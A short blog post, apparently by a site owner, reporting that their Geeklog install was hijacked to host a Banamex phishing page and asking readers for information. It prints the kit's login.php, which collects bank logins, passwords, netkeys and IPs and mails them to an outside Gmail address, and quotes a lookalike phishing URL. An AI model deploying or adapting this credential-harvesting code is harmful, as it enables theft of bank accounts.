« Be not anxious! | Main | Resolving the missing Ad Management link (SMF 1.1.3) »

"Bana" banamex scam


I recently went in and triaged a Geeklog install I haven't touched in a few months. Lo and behold, it had been hijacked by scammer spammers. Here is login.php:


$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];
$message .= $ip = getenv("REMOTE_ADDR");

//sending email info here

$subj = "Bancanet - Banamex";
$from = "From: Info";
mail("devilzx0@gmail.com", $subj, $message, $from);
header("Location: verificacion.htm");

My ISP was complaining of mail sent. This was probably it. There are a lot of references in the index.htm and verificacion.html to banamex.com. Check out this particular segment of verficacion.htm:

file:///D:/Banking/Scams/Scam/Upload%20Scam/Upload%20Venezuela/Mis%20documentos/Mis%20archivos%20recibidos/letter_files/nuevobnp.css

How and where is the money made here? Harvesting accidental logins... There is one redirection to "istemp.com":

href="http://centralbanamex.com.istemp.com/banamex/"

Anyone know anything about this?

Update: Here's the phishing alert. It's from 2005.

Post a comment


Please enter the security code you see here